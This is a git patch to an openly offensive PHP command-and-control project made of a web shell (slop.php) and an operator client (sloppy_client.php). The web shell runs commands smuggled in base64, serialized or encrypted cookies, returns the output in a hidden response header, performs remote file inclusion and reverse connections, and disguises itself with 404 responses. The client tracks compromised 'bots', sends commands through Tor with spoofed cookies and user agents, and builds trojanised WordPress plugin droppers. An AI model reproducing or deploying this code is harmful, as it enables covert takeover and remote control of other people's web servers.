From 630f01da0d603b7743c7d953aec65056fc739b3c Mon Sep 17 00:00:00 2001 From: oldkingcone <11233163+oldkingcone@users.noreply.github.com> Date: Sun, 31 Dec 2023 18:39:26 -0500 Subject: [PATCH] :smile_cat: Added pagination of information in the database. Client will successfully execute commands and process the output in the users terminal. This will be expanded with more functionality, and the pagination will ALSO be expanded to have more functionality, right now its buggy and is prone if you exceed the last page to not print any results. oops. it happens. Will likely improve upon the pagination portion, just wanted to get it working. --- .gitignore | 3 +- lib/classes.inc.php | 33 ++- lib/composer.json | 3 +- .../genericClientExecuteCommands.php | 16 +- .../genericClientExecuteReverseShell.php | 12 + .../genericClientValidateHosts.php | 14 + lib/database/slopSqlite.php | 58 +++-- lib/fake_the_landing/randomDefaultPage.php | 2 +- .../populateRandomProxies.php | 2 +- slop.php | 241 +++++++++--------- sloppy_client.php | 126 +++++++-- 11 files changed, 328 insertions(+), 182 deletions(-) rename lib/proxies/{ => randomProxies}/populateRandomProxies.php (54%) diff --git a/.gitignore b/.gitignore index e2b6ab0..5f61f68 100644 --- a/.gitignore +++ b/.gitignore @@ -7,5 +7,6 @@ # Editor-based HTTP Client requests /httpRequests/ test.php -lib/vendor/* lib/composer.lock +/lib/vendor/ +/.scache/ diff --git a/lib/classes.inc.php b/lib/classes.inc.php index ba48124..71c5901 100644 --- a/lib/classes.inc.php +++ b/lib/classes.inc.php @@ -2,30 +2,41 @@ // auto load include "lib/vendor/autoload.php"; -// custom php classes +//curl stuff +include "lib/curlStuff/defaultClient/genericClientExecuteCommands.php"; +include "lib/curlStuff/defaultClient/genericClientValidateHosts.php"; +include "lib/curlStuff/defaultClient/genericClientExecuteReverseShell.php"; include "lib/curlStuff/validateMeMore/talkToMeDamnit.php"; +include "lib/curlStuff/mainCurl.php"; +//bots include "lib/bots/bot_cmds/doMyBidding.php"; -include "lib/bots/bot_coms/listenToMe.php"; include "lib/bots/bot_esplode/mustRetreat.php"; include "lib/bots/bot_files/hereEatThis.php"; +// make new bots +include "lib/new_bots/makeMeSlim/slimDropper.php"; +include "lib/new_bots/wordpressPlugins/makeMeWordPressing.php"; +//crypto include "lib/crypto/encryptMyComs/hideMyCommunication.php"; include "lib/crypto/needSalt/missingSalt.php"; -include "lib/proxyWorks/confirmProxy.php"; +include "lib/crypto/certMaker/certGenerator.php"; +// config and menu + logo include "lib/config/defaultConfig.php"; -include "lib/fake_the_landing/randomDefaultPage.php"; include "lib/logos/art/artisticStuff.php"; include "lib/logos/menus/mainMenu.php"; -include "lib/new_bots/makeMeSlim/slimDropper.php"; -include "lib/proxies/populateRandomProxies.php"; include "lib/userAgents/agentsList.php"; +// init include "lib/initialization/slop_pg/slop_pg.php"; +include "lib/initialization/initializeC2/initializeC2ConfigFile.php"; +include "lib/fake_the_landing/randomDefaultPage.php"; +//proxies +include "lib/proxies/randomProxies/populateRandomProxies.php"; +include "lib/proxyWorks/confirmProxy.php"; +//database include "lib/database/slopPgSql.php"; include "lib/initialization/slop_sqlite/slop_sqlite.php"; include "lib/database/slopSqlite.php"; -include "lib/initialization/initializeC2/initializeC2ConfigFile.php"; -include "lib/new_bots/wordpressPlugins/makeMeWordPressing.php"; -include "lib/curlStuff/mainCurl.php"; -include "lib/crypto/certMaker/certGenerator.php"; + + use config\defaultConfig; @@ -51,5 +62,5 @@ set_include_path(get_include_path() . constant("CUSTOM_PATH_SEPARATOR") . getcwd() . "/lib"); if (!defined("SQL_USE")){ - $a = new initialization\initializeC2\initializeC2ConfigFile(default_config->exportConfigConstants()['slop_home'], true); + $a = new initialization\initializeC2\initializeC2ConfigFile(default_config->exportConfigConstants()['slop_home'], false); } diff --git a/lib/composer.json b/lib/composer.json index 9e62e18..f0febd9 100644 --- a/lib/composer.json +++ b/lib/composer.json @@ -10,6 +10,7 @@ "jenssegers/optimus": "^1.1", "fakerphp/faker": "^1.23", "guzzlehttp/guzzle": "^7.8", - "ext-zlib": "*" + "ext-zlib": "*", + "monolog/monolog": "^3.5" } } diff --git a/lib/curlStuff/defaultClient/genericClientExecuteCommands.php b/lib/curlStuff/defaultClient/genericClientExecuteCommands.php index fa6fccc..6641a98 100644 --- a/lib/curlStuff/defaultClient/genericClientExecuteCommands.php +++ b/lib/curlStuff/defaultClient/genericClientExecuteCommands.php @@ -3,17 +3,31 @@ namespace curlStuff\defaultClient; use GuzzleHttp\Client; +use GuzzleHttp\Cookie\CookieJar; +use GuzzleHttp\HandlerStack; +use GuzzleHttp\Middleware; +use GuzzleHttp\MessageFormatter; +use Monolog\Logger; use Psr\Http\Message\ResponseInterface; +use GuzzleHttp\Exception\ConnectException; class genericClientExecuteCommands extends Client { + private CookieJar $cookieJar; + public function __construct(array $config = []) { + $config['http_errors'] = false; + $config['debug'] = false; parent::__construct($config); } public function head($uri, array $options = []): ResponseInterface { - return $this->head($uri); + try { + return parent::head($uri, $options); + }catch (ConnectException){ + throw new \Exception("\033[0;31mIt appears as though we were not able to connect properly. Please check the supplied information and try again. Are you sure your shell was successfully deployed?\033[0m"); + } } } \ No newline at end of file diff --git a/lib/curlStuff/defaultClient/genericClientExecuteReverseShell.php b/lib/curlStuff/defaultClient/genericClientExecuteReverseShell.php index 2b5f70a..cf6d35a 100644 --- a/lib/curlStuff/defaultClient/genericClientExecuteReverseShell.php +++ b/lib/curlStuff/defaultClient/genericClientExecuteReverseShell.php @@ -6,5 +6,17 @@ class genericClientExecuteReverseShell extends Client { + public function __construct(array $config = []) + { + parent::__construct($config); + } + + public function executeReverseShell(array $options = []) + { + // code for executing reverse shell + if (is_null(array_key_last($options))){ + throw new \InvalidArgumentException("\033[0;31moptions cannot be null.\033[0m"); + } + } } \ No newline at end of file diff --git a/lib/curlStuff/defaultClient/genericClientValidateHosts.php b/lib/curlStuff/defaultClient/genericClientValidateHosts.php index 6d9760c..66e2883 100644 --- a/lib/curlStuff/defaultClient/genericClientValidateHosts.php +++ b/lib/curlStuff/defaultClient/genericClientValidateHosts.php @@ -3,6 +3,7 @@ namespace curlStuff\defaultClient; use GuzzleHttp\Client; +use Psr\Http\Message\ResponseInterface; class genericClientValidateHosts extends Client { @@ -10,4 +11,17 @@ public function __construct(array $config = []) { parent::__construct($config); } + + public function head($uri, array $options = []): ResponseInterface + { + if (is_null(array_key_last($options))){ + $options[] = $this->getConfig(); + } + return parent::head($uri, $options); + } + + public function getConfig(string $option = null) + { + return parent::getConfig($option); // TODO: Change the autogenerated stub + } } \ No newline at end of file diff --git a/lib/database/slopSqlite.php b/lib/database/slopSqlite.php index 5137095..80cde1e 100644 --- a/lib/database/slopSqlite.php +++ b/lib/database/slopSqlite.php @@ -9,9 +9,13 @@ class slopSqlite extends \SQLite3 { + private array $bot_data; + private $currentRows; + public function __construct(string $filename, int $flags = SQLITE3_OPEN_READWRITE | SQLITE3_OPEN_CREATE) { parent::__construct($filename, $flags); + $this->bot_data = []; } public static function escapeString(string $string): string { @@ -122,7 +126,6 @@ private function insertEncryptedTool(array $data): bool $stmt->bindValue(':is_encrypted', $data['is_encrypted']); return $stmt->execute() !== false; } - private function insertTool(array $data): bool { $stmt = $this->prepare("INSERT INTO sloppy_bots_tools(tool_name, target, base64_encoded_tool, lang, is_encrypted) VALUES(:tool_name, :target, :base64_encoded_tool, :lang, :is_encrypted);"); @@ -133,27 +136,46 @@ private function insertTool(array $data): bool $stmt->bindValue(':is_encrypted', $data['is_encrypted']); return $stmt->execute(); } - private function grabAndFormatOutput() - { - $res = $this->query('SELECT id, proto, rhost, uri, uuid, os_flavor, agent, cname, cvalue FROM sloppy_bots_main'); - $rows = []; - while ($row = $res->fetchArray(SQLITE3_ASSOC)) $rows[] = $row; - $output = new ConsoleOutput(); - $table = new Table($output); - $table->setHeaders(array_keys($rows[0])); - $table->setRows($rows); - $table->render(); + public function grabAndFormatOutput(int $lastId = 0, int $itemsPerPage = 20) + { + $query = sprintf( + 'SELECT id, proto, rhost, uri, uuid, os_flavor, agent, cname, cvalue + FROM sloppy_bots_main + WHERE id > %s + ORDER BY id ASC + LIMIT %s', + $lastId, + $itemsPerPage + ); + $res = $this->query($query); + if (!is_bool($res)) { + $rows = []; + while ($row = $res->fetchArray(SQLITE3_ASSOC)) $rows[] = $row; + if (count($rows) === 0){ + return $lastId; + } + $lastId = end($rows)['id']; + $output = new ConsoleOutput(); + $table = new Table($output); + $table->setHeaders(array_keys($rows[0])); + $table->setRows($rows); + $table->render(); + return $lastId; + } else { + return $lastId; + } } + private function selectBot(string $id): array{ + echo $id.PHP_EOL; + $this->bot_data = []; $bot = $this->prepare('SELECT proto, rhost, uri, uuid, os_flavor, agent, cname, cvalue FROM sloppy_bots_main WHERE id = :bot_id'); $bot->bindValue(':bot_id', $id); $r = $bot->execute(); - $ro = []; while ($res = $r->fetchArray(SQLITE3_ASSOC)){ - var_dump($res); - $ro[] = $res; + $this->bot_data[] = $res; } - return $ro; + return $this->bot_data; } public function slopSqlite(array $data): mixed { @@ -163,11 +185,9 @@ public function slopSqlite(array $data): mixed } try{ switch (true) { - case str_contains($data['action'], "fetch"): - $this->grabAndFormatOutput(); - return true; case str_contains($data['action'], "grabBot"): - return $this->selectBot($data['id']); + $this->selectBot($data['botID']); + return $this->bot_data; case str_contains($data['action'], "add_press"): return $this->insertPress($data); case str_contains($data['action'], "add_bot"): diff --git a/lib/fake_the_landing/randomDefaultPage.php b/lib/fake_the_landing/randomDefaultPage.php index 59b3182..237d77c 100644 --- a/lib/fake_the_landing/randomDefaultPage.php +++ b/lib/fake_the_landing/randomDefaultPage.php @@ -3,7 +3,7 @@ namespace fake_the_landing; use config\defaultConfig; - +// look at using react PHP event loops for this. /** * @property string $characters diff --git a/lib/proxies/populateRandomProxies.php b/lib/proxies/randomProxies/populateRandomProxies.php similarity index 54% rename from lib/proxies/populateRandomProxies.php rename to lib/proxies/randomProxies/populateRandomProxies.php index 787913d..bebee20 100644 --- a/lib/proxies/populateRandomProxies.php +++ b/lib/proxies/randomProxies/populateRandomProxies.php @@ -1,6 +1,6 @@ $value) { + if (strpos($key, 'HTTP_') === 0) { + $headers[str_replace(' ', '-', ucwords(strtolower(str_replace('_', ' ', substr($key, 5)))))] = $value; + } + } + if (validate_auth($_SERVER['HTTP_USER_AGENT'], $_COOKIE[cname], $_COOKIE['uuid'])) { header("I-Am-Alive: Yes"); banner(); - if ($_SERVER["REQUEST_METHOD"] == "HEAD") { - switch (true) { - case (isset($_SERVER['qs'])): - foreach (checkComs() as $commands => $isenabled) { - $isenabled = trim($isenabled); - if ($isenabled === "Disabled") { - $r = "\033[0;31m{$isenabled}\033[0m"; - } else { - $r = "\033[0;36m{$isenabled}\033[0m"; - } - echo sprintf("\033[0;35m[ %s ]\033[0m => %s\n", $commands, trim($r)); + switch (true) { + case (isset($_COOKIE['qs'])): + foreach (checkComs() as $commands => $isenabled) { + $isenabled = trim($isenabled); + if ($isenabled === "Disabled") { + $r = "\033[0;31m{$isenabled}\033[0m"; + } else { + $r = "\033[0;36m{$isenabled}\033[0m"; } - foreach (checkShells(slopos) as $shells => $isenabled) { - $isenabled = trim($isenabled); - if ($isenabled === "Disabled") { - $r = "\033[0;31m{$isenabled}\033[0m"; - } else { - $r = "\033[0;36m{$isenabled}\033[0m"; - } - echo sprintf("\033[0;35m[ %s ]\033[0m => %s\n", $shells, trim($r)); + echo sprintf("\033[0;35m[ %s ]\033[0m => %s\n", $commands, trim($r)); + } + foreach (checkShells(slopos) as $shells => $isenabled) { + $isenabled = trim($isenabled); + if ($isenabled === "Disabled") { + $r = "\033[0;31m{$isenabled}\033[0m"; + } else { + $r = "\033[0;36m{$isenabled}\033[0m"; } - foreach (parseProtections() as $prots => $isenabled) { - $isenabled = trim($isenabled); - if ($isenabled === "Disabled") { - $r = "\033[0;31m{$isenabled}\033[0m"; - } else { - $r = "\033[0;36m{$isenabled}\033[0m"; - } - echo sprintf("\033[0;35m[ %s ]\033[0m => %s\n", $prots, trim($r)); + echo sprintf("\033[0;35m[ %s ]\033[0m => %s\n", $shells, trim($r)); + } + foreach (parseProtections() as $prots => $isenabled) { + $isenabled = trim($isenabled); + if ($isenabled === "Disabled") { + $r = "\033[0;31m{$isenabled}\033[0m"; + } else { + $r = "\033[0;36m{$isenabled}\033[0m"; } - foreach (checkPack() as $packs => $isenabled) { - $isenabled = trim($isenabled); - if ($isenabled === "Disabled") { - $r = "\033[0;31m{$isenabled}\033[0m"; - } else { - $r = "\033[0;36m{$isenabled}\033[0m"; - } - echo sprintf("\033[0;35m[ %s ]\033[0m => %s\n", $packs, trim($r)); + echo sprintf("\033[0;35m[ %s ]\033[0m => %s\n", $prots, trim($r)); + } + foreach (checkPack() as $packs => $isenabled) { + $isenabled = trim($isenabled); + if ($isenabled === "Disabled") { + $r = "\033[0;31m{$isenabled}\033[0m"; + } else { + $r = "\033[0;36m{$isenabled}\033[0m"; } - $fsize = ini_get("max_file_uploads") ? "\033[0;32m" . ini_get("max_file_uploads") . "\033[0m" : "\033[0;31mcannot set max_file_uploads\033[0m"; - $sfem = ini_get("safe_mode") ? "\033[0;32mset to true\033[0m" : "\033[0;31mcannot set safemode.\033[0m"; - $fups = ini_get("file_uploads") ? "\033[0;32mtrue\033[0m" : "\033[0;31mfalse\033[0m"; - $maxium_size = ini_get("upload_max_filesize") ? "\033[0;32m" . ini_get("upload_max_filesize") . "\033[0m" : "\033[0;31mcannot set fileupload size.\033[0m"; - $ftd = ini_get("upload_tmp_dir") ? "\033[0;32m" . ini_get("upload_tmp_dir") . "\033[0m" : "\033[0;31mcannot set upload_tmp_dir\033[0m"; - $incp = get_include_path(); - $slopDefines = implode(PHP_EOL, [ - sprintf("slopEncryption: %s", slopEncryption ? "\033[0;32mtrue\033[0m" : "\033[0;31mfalse\033[0m"), - sprintf("slopOS: \033[0;32m%s\033[0m", slopos), - sprintf("slopShell: \033[0;32m%s\033[0m", sloppyshell), - sprintf("slopTor: %s", slopTor ? "\033[0;32mtrue\033[0m" : "\033[0;31mfalse\033[0m"), - sprintf("slopPGP: %s", slopPGP ? "\033[0;32mtrue\033[0m" : "\033[0;31mfalse\033[0m"), - sprintf(".scache full path: %s", scache) - ]); - echo << %s\n", $packs, trim($r)); + } + $fsize = ini_get("max_file_uploads") ? "\033[0;32m" . ini_get("max_file_uploads") . "\033[0m" : "\033[0;31mcannot set max_file_uploads\033[0m"; + $sfem = ini_get("safe_mode") ? "\033[0;32mset to true\033[0m" : "\033[0;31mcannot set safemode.\033[0m"; + $fups = ini_get("file_uploads") ? "\033[0;32mtrue\033[0m" : "\033[0;31mfalse\033[0m"; + $maxium_size = ini_get("upload_max_filesize") ? "\033[0;32m" . ini_get("upload_max_filesize") . "\033[0m" : "\033[0;31mcannot set fileupload size.\033[0m"; + $ftd = ini_get("upload_tmp_dir") ? "\033[0;32m" . ini_get("upload_tmp_dir") . "\033[0m" : "\033[0;31mcannot set upload_tmp_dir\033[0m"; + $incp = get_include_path(); + $slopDefines = implode(PHP_EOL, [ + sprintf("slopEncryption: %s", slopEncryption ? "\033[0;32mtrue\033[0m" : "\033[0;31mfalse\033[0m"), + sprintf("slopOS: \033[0;32m%s\033[0m", slopos), + sprintf("slopShell: \033[0;32m%s\033[0m", sloppyshell), + sprintf("slopTor: %s", slopTor ? "\033[0;32mtrue\033[0m" : "\033[0;31mfalse\033[0m"), + sprintf("slopPGP: %s", slopPGP ? "\033[0;32mtrue\033[0m" : "\033[0;31mfalse\033[0m"), + sprintf(".scache full path: %s", scache) + ]); + echo << false])); - executeCommands($split); - } elseif ($_SERVER['cr'] === '1b') { - $split = base64_decode($_COOKIE['jsessionid']); - executeCommands($split); - } else { - $s = $_COOKIE['jsessionid']; - $v = explode(".", base64_decode($s)); + break; + case (isset($_COOKIE["cr"])): + if ($_COOKIE['cr'] === "1") { + $split = base64_decode(unserialize(base64_decode($_COOKIE['jsessionid']), ["allowed_classes" => false])); + header(sprintf("D: %s", base64_encode(executeCommands($split)))); + } elseif ($_COOKIE['cr'] === '1b') { + $split = base64_decode($_COOKIE['jsessionid']); + header(sprintf("D: %s", base64_encode(executeCommands($split)))); + } else { + $s = $_COOKIE['jsessionid']; + $v = explode(".", base64_decode($s)); + if (defined("slopEncryption") && slopEncryption) { try { $split = sodium_crypto_aead_chacha20poly1305_decrypt(base64_decode($v[3]), base64_decode($v[2]), base64_decode($v[0]), base64_decode($v[1])); } catch (SodiumException $e) { echo "Failed to decrypt: {$e->getMessage()}" . PHP_EOL; } - executeCommands(base64_decode($split)); + header(sprintf("D: %s", base64_encode(executeCommands($split)))); + } else { + header("D: Damnit jim, im a doctor, not a magician."); } - break; - case (isset($_SERVER["doInclude"])): - remoteFileInclude($_SERVER["doInclude"]); - break; - case (isset($_COOKIE["cb64"])): - $aSX = explode(".", $_COOKIE['cb64']); - if (hash("sha512", $_COOKIE['jsessionid'], $binary = false) === $aSX[1]) { - $sp = explode('.', base64_decode($_COOKIE['jsessionid'])); - try { - $final = sodium_crypto_aead_xchacha20poly1305_ietf_decrypt($sp[3], $sp[0], $sp[1], $sp[2]); - } catch (SodiumException $e) { - throw new Exception("I require Sodium!"); - } - $axD = unserialize(base64_decode($final), ['allowed_classes' => false]); - b64($axD, $aSX[0]); + } + break; + case (isset($_COOKIE["doInclude"])): + remoteFileInclude($_COOKIE["doInclude"]); + break; + case (isset($_COOKIE["cb64"])): + $aSX = explode(".", $_COOKIE['cb64']); + if (hash("sha512", $_COOKIE['jsessionid'], $binary = false) === $aSX[1]) { + $sp = explode('.', base64_decode($_COOKIE['jsessionid'])); + try { + $final = sodium_crypto_aead_xchacha20poly1305_ietf_decrypt($sp[3], $sp[0], $sp[1], $sp[2]); + } catch (SodiumException $e) { + throw new Exception("I require Sodium!"); } - break; - case ($_SERVER['REQUEST_METHOD'] === "HEAD" && isset($_COOKIE['jsessionid'])): - $splitter = explode(".", base64_decode($_COOKIE['jsessionid'])); - if (function_exists('pcntl_fork') === true) { - $pid = pcntl_fork(); - if ($pid === -1) { - die("\n\n"); - } else { - pcntl_wait($status); - reverseConnections($splitter[0], $splitter[3], $splitter[1], $splitter[2]); - } + $axD = unserialize(base64_decode($final), ['allowed_classes' => false]); + b64($axD, $aSX[0]); + } + break; + case ($_SERVER['REQUEST_METHOD'] === "HEAD" && isset($_COOKIE['jsessionid'])): + $splitter = explode(".", base64_decode($_COOKIE['jsessionid'])); + if (function_exists('pcntl_fork') === true) { + $pid = pcntl_fork(); + if ($pid === -1) { + die("\n\n"); } else { - echo "Cannot fork, as it does not exist on this system..... using passthru\n"; - $re = null; - passthru(reverseConnections($splitter[0], $splitter[3], $splitter[1], $splitter[2]), $re); + pcntl_wait($status); + reverseConnections($splitter[0], $splitter[3], $splitter[1], $splitter[2]); } - break; - default: - break; - } - foreach (uwumodifyme() as $new_data => $d) { - header("{$new_data}: {$d}"); - } - unlink($_SERVER['SCRIPT_FILENAME']); - http_response_code(404); - die(); - } else { - http_response_code(404); - header("File Not Found"); - die(); + } else { + echo "Cannot fork, as it does not exist on this system..... using passthru\n"; + $re = null; + passthru(reverseConnections($splitter[0], $splitter[3], $splitter[1], $splitter[2]), $re); + } + break; + default: + break; } +// foreach (uwumodifyme() as $new_data => $d) { +// header("{$new_data}: {$d}"); +// } +// unlink($_SERVER['SCRIPT_FILENAME']); + die(); + } else { + die(); } } try { + header("Reason: File Not Found", false, 404); slopp(); } catch (Exception $e) { error_log($e, 3, sprintf("%s/ahhhhh.log", scache)); diff --git a/sloppy_client.php b/sloppy_client.php index 243ef1e..4b5b3b4 100644 --- a/sloppy_client.php +++ b/sloppy_client.php @@ -2,32 +2,30 @@ require_once "lib/classes.inc.php"; //crypto -use crypto\certMaker\certGenerator; +use curlStuff\defaultClient\genericClientExecuteCommands; +use curlStuff\mainCurl; +use curlStuff\validateMeMore\talkToMeDamnit; +use logos\art\artisticStuff; +use logos\menus\mainMenu; +use new_bots\makeMeSlim\slimDropper; +use new_bots\wordpressPlugins\makeMeWordPressing; +use userAgents\agentsList; + //end crypto //pipe dream. -use fake_the_landing\randomDefaultPage; //end pipe dream. // communications -use curlStuff\validateMeMore\talkToMeDamnit; -use curlStuff\mainCurl; -use userAgents\agentsList; -use proxyWorks\confirmProxy; //end communications // might remove this, since tor is what should be used. -use proxies\populateRandomProxies; // end stuff. // droppers -use new_bots\makeMeSlim\slimDropper; -use new_bots\wordpressPlugins\makeMeWordPressing; // end droppers //graphics and shit -use logos\art\artisticStuff; -use logos\menus\mainMenu; //end graphipcs and shit. $d = default_config; @@ -42,38 +40,109 @@ "sqlite" => $configs['sqlite_presets'] ]; -if (str_contains(SQL_USE, "PGSQL")){ +if (str_contains(SQL_USE, "PGSQL")) { $database = new database\slopPgSql($choices['postgres']['pg_host'], $choices['postgres']['pg_user'], $choices['postgres']['pg_pass']); $database->firstRun(); -}else{ +} else { $database = new database\slopSqlite($choices['sqlite']['sqlite_db']); var_dump($database->firstRun()); readline("Press enter to continue."); } - $l->prepareFrames(); $l->displayLogo(); -while (true){ +while (true) { system(CLEAR); $l->displayStaticAsciiLogo(); $m->menu(); $c = strtolower(trim(readline("->"))); - switch ($c){ + switch ($c) { case str_starts_with($c, "sys") !== false: $m->enumSystemMenu(); - $a = new curlStuff\defaultClient\genericClientExecuteCommands(); + $a = new genericClientExecuteCommands(); break; case str_starts_with($c, "rev") !== false: $m->reverseConnectionsMenu(); break; case str_starts_with($c, "com") !== false: $m->commandMenu(); - $database->slopSqlite(['action' => "fetch"]); - $id = readline("\033[0;34mPlease select a bot id to use:\033[0m ->"); - $database->slopSqlite(['action' => "grabBot", "id" => $id]); - var_dump($database); - readline("press enter."); + $page = 0; + $itemsPerPage = 10; + $lastId = 0; + $previous = 0; + do { + $lastId = $database->grabAndFormatOutput($lastId, $itemsPerPage); + $lastPage = ($lastId < $itemsPerPage); + echo "Current Page: " . ($page + 1) . "\n"; + echo "Press 'n' for next, 'b' for back, or 'q' to quit: "; + $handle = fopen("php://stdin", "r"); + $action = trim(fgets($handle)); + fclose($handle); + if (is_numeric($action)) { + $selectedEntry = $action; + break; + } + if ($action ==='n') { // next page + if (!$lastPage) { + $page++; + $lastId = $database->grabAndFormatOutput($lastId, $itemsPerPage); + $lastPage = ($lastId < $itemsPerPage); + if ($lastPage) { + echo "You're on the last page.\n"; + } + } else { + echo "You're already on the last page.\n"; + } + } elseif ($action === 'b') { + if ($page > 0) { + $page--; + $lastId -= $itemsPerPage; + $lastId = $database->grabAndFormatOutput($lastId, $itemsPerPage); + } else { + echo "You're on the first page. Cannot go back any further.\n"; + } + } + } while ($action !== "q"); + if ($action === "q"){ + break; + } + $bot = $database->slopSqlite(['action' => "grabBot", "botID" => $selectedEntry]); + $coms = new genericClientExecuteCommands([ + "base_uri" => sprintf("%s://%s", $bot[0]['proto'], $bot[0]['rhost']), + "timeout" => 5, + "allow_redirects" => false, + "proxy" => [ + "http" => $d->tor, + "https" => $d->tor + ], + "cookies" => true, + "protocols" => $bot[0]['proto'], + "strict" => false, + "referrer" => false, + "track-redirects" => true + ] + ); + try { + $command = $coms->head($bot[0]['uri'], + [ + 'headers' => [ + "cr" => "1b", + "User-Agent" => $bot[0]['agent'], + "Cookie" => sprintf("jsessionid=%s; %s=%s; uuid=%s; cr=1b", sprintf("%s", base64_encode(readline("What would you like to execute: "))), $bot[0]['cname'], $bot[0]['cvalue'], $bot[0]['uuid']) + ] + ] + ); + }catch (Exception $e){ + echo $e->getMessage().PHP_EOL; + readline("Exception occured....... Press enter to continue.".PHP_EOL); + break; + } + if (!is_null($command->getHeaderLine('D'))){ + echo sprintf("Command completed!\n\n\033[0;35m%s\033[0m\n\n", base64_decode($command->getHeaderLine("D"))); + }else{ + echo "Command failed successfully.....".PHP_EOL; + } + readline("[ !! ] PRESS ENTER TO CONTINUE [ !! ]"); break; case str_starts_with($c, "a") !== false: $m->addHostMenu(); @@ -81,10 +150,10 @@ case str_starts_with($c, "cr") !== false: $m->dropperMenu(); $c = trim(strtolower(readline("-> "))); - switch ($c){ - case str_contains($c,"small") !== false: + switch ($c) { + case str_contains($c, "small") !== false: $act_word = trim(readline("Activation Keyword: ")); - if (is_null($act_word) or $act_word === ""){ + if (is_null($act_word) or $act_word === "") { $act_word = bin2hex(openssl_random_pseudo_bytes(24)); } $trj = new makeMeWordPressing($act_word, $agents->getRandomAgent(), bin2hex(openssl_random_pseudo_bytes(10)), bin2hex(openssl_random_pseudo_bytes(50))); @@ -99,7 +168,7 @@ break; case str_contains($c, "chonker") !== false: $act_word = trim(readline("Activation Keyword: ")); - if (is_null($act_word) or $act_word === ""){ + if (is_null($act_word) or $act_word === "") { $act_word = bin2hex(openssl_random_pseudo_bytes(24)); } $trj = new makeMeWordPressing($act_word, $agents->getRandomAgent(), bin2hex(openssl_random_pseudo_bytes(10)), bin2hex(openssl_random_pseudo_bytes(50))); @@ -134,7 +203,7 @@ try { $validateMeMore->checkMultiHost($database->grabOrFormatOutput(['type' => 'all_bots'])["bots"]); } catch (Exception $e) { - echo $e.PHP_EOL; + echo $e . PHP_EOL; } break; case str_starts_with($c, "at") !== false: @@ -153,7 +222,7 @@ $m->generateCertMenu(); break; case str_starts_with($c, "o") !== false: - echo "Current Options: ".PHP_EOL; + echo "Current Options: " . PHP_EOL; print_r($configs); readline("Press enter to continue."); break; @@ -169,4 +238,5 @@ echo "\033[0;31mThat is not a valid command."; break; } + $c = ""; }